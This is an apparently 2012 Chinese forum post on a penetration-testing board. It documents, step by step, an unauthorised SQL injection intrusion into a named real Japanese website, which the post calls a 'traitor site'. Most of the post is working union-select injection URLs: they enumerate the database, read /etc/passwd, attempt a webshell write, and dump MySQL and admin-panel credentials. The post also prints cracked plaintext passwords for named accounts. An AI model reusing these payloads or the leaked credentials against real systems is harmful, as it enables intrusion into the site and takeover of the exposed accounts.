找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3945|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

3 v$ a: E0 J) ~; R& n( W! f. i9 e  r, F3 D
0x01. 检测 www.zuaa.jp 收集数据
& h2 Y& v" @" V5 [7 x: j( u$ [5 T. p2 p
9 Y; d  Y2 F# l5 W
whatweb
* S+ q+ J! W- P& }& T* k/ Y% C3 ?; o
6 F+ Q& _( M; }  O$ O! z
利用NMAP扫描
& H& G! W3 q+ s3 k) O# @
7 R$ u3 f' J0 h" n: g中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
  H/ e/ n. Q, i. k0x02.找注入点
' C3 I. u. J1 u找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
+ _' u0 F. H7 \/ Q4 ?3 q/ v2 D% T9 m7 e; s" ]& D' e% I
; \; K* c" r0 }9 `
0x03.order by, @/ O  l( Z- M; {) I1 E6 |' |
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 17 }: Y7 d5 D$ S7 ?# j

% I7 h/ b0 I+ \8 G- S$ K  y. jorder by 28报错,order by 27正常
0 l* e! ^8 M3 S/ K( V. G& C" G9 v9 R0 \9 u4 ^) v% ]
0x04.   union手动查询. @5 G+ w9 e8 @# }% V! J: V  p: x+ u
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
1 c8 i, {1 P, K4 p6 v7 h: B# P. x添加到 27 时正常显示 % P4 A# ]* @- t) v

% ^7 e/ D7 r6 o中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持& z  |" W6 `/ I/ p! X8 V
; d2 u- `( ?7 p' {. I* ~
0x05. info:
+ r+ ~; `3 G  D- o! X; n' Uhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
& T; Q7 t# K  I: E# Z! L  k9 H  O
7 g+ ?' g7 x4 [, `# s0 wuser:            root@localhost
; e! P8 ?6 O; ^& Y# Pdatabase:    openpne
  Y+ o5 Z. M- @version:      4.1.22, X6 q; `2 D  P, Q4 _9 C3 c1 p
os:             portbld-freebsd5.4
6 r5 t* e& w( g8 ?; K
1 V+ ?0 W0 W  P0x06. root用户
! l, D9 I2 k1 w利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)8 Y+ w! O0 K% r' S7 V7 X" ?. U9 Q
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
9 h; s/ j1 @* U7 l2 h3 \' j- |
5 ~6 u( ]8 X) V+ v5 J& e8 }7 K通过工具转换
4 l+ J) Q. k! z6 F6 |: f; ?
3 J0 Q* S+ k3 F+ W, v中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持2 M& M. Z  M( Y. ~0 a( f3 t5 h, r
6 ^! b9 Z- j, x/ l$ _
0x07. 利用 into outfile' A% s4 l$ ?. R; `: i; k
全部都失败
' i9 q. l$ X+ O  `http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php2 o7 x; B1 |- K- T$ Q
. h5 H$ ?2 e# m5 b
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php ' Z7 R9 ]: B& v8 ^
# E& e9 M7 n+ h  R& j  f0 |; t
页面显示“MDB2 Error:syntax error”
  c* B% e" c4 O* `
, ?+ R! L" O" W8 C5 f# _' w0x08. 利用 mysql 4.1: @# X3 ~. W, x! o" D* M: l& s
猜常规表名,字段未果 工具 sqlmap; h. `" w9 @7 w, y* u+ n6 w' [1 s
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
! x7 v. o% ^  {8 \, s& n7 r( ]" j3 V% M) I3 U: [0 U, {& V' d

8 ?4 x) ~6 }- U  l$ X9 t9 e% Z8 V* ~) p) [1 b/ O4 [3 r/ p
0x09. 查找后台1 ~( o7 s: h8 L6 R9 J
利用 现有的各种 后台工具尝试都不行
' L5 y+ o# g9 m9 L. I8 X7 ~. T- b6 }4 @% C# Y" W
0x10.  MySL外联方法5 D0 s$ A8 {( e
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
! {, I8 B3 v1 |' Z' M- m+ c+ f可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user' I- m4 \% i8 w+ A
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
7 h- h1 K1 _  v3 B. k& k
7 h+ I8 Y6 e7 I# q/ S6 x这个可以在 www.cmd5.com 解密5 i* U4 x* U, U* o
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009& j" Z3 m# U1 ~- f* @! |
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
2 O, v6 g, U0 ^' P7 uopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???! [2 ^" {8 S7 A
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
8 |* w( U) k+ y工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知  V) W  o* k" \! ^

' a1 \$ ^6 ?: t) \! x3 ~; l" |3 g" x0 b% h  A! \& N7 z5 ]
0x11. 网站突破
. \0 P4 a8 G# N2 p发现网站的源程序 openpne, google 下载 openpne 源码. ~9 [% N4 x( o3 M& _: G9 I

. H' }7 y9 }9 X$ u' N* M0 F2 R6 Z4 L2 F. h6 Y
0x12. 默认信息利用0 ^: A8 a: T- z& w) ?# O3 Y; h7 ?
http://sns.zuaa.jp/?m=admin&a=page_login
6 j, u2 t! c+ E+ K+ ~( Q$ W5 E& o5 [5 ?$ v* C+ n" ~8 Q8 I+ t
表名 (c_admin_user) ,字段名(username,password)
0 u. t( d2 r6 Qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
& n+ U( ?# b7 g2 |  P4 U% W
4 t5 ]) B0 f7 Y7 S- ?解密$ v1 g' @' ^; m
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009! g  b5 K  m  u- y; _3 K4 ]0 [
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
5 }  [6 _9 ]- D% ~. q  I- e4 H' W% u# u+ P
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持$ e/ h7 j& u. J
+ I! P7 i# z1 {$ {
0x13. 登录后台
9 }; S7 k8 P) G) [0 {$ N# Z( P: S; v6 O7 |4 i

, i, t8 Z- D( J7 _" `# s0 ^) E  k2 z$ A. U2 A, ?
0x14. 小结. X+ L- c2 H6 i& H
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
# z. q& [' O# w, y% ?4 b0 n感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点2 C0 H2 D4 c% k" f( H1 n1 I
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain; [4 r) |2 O9 v0 |, g
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持/ s; Q6 n8 s! P# ^

8 u5 b! k3 @' s; F  O5 X最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!( {! f" \- @( W! J# O2 G. E# B! P8 i

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表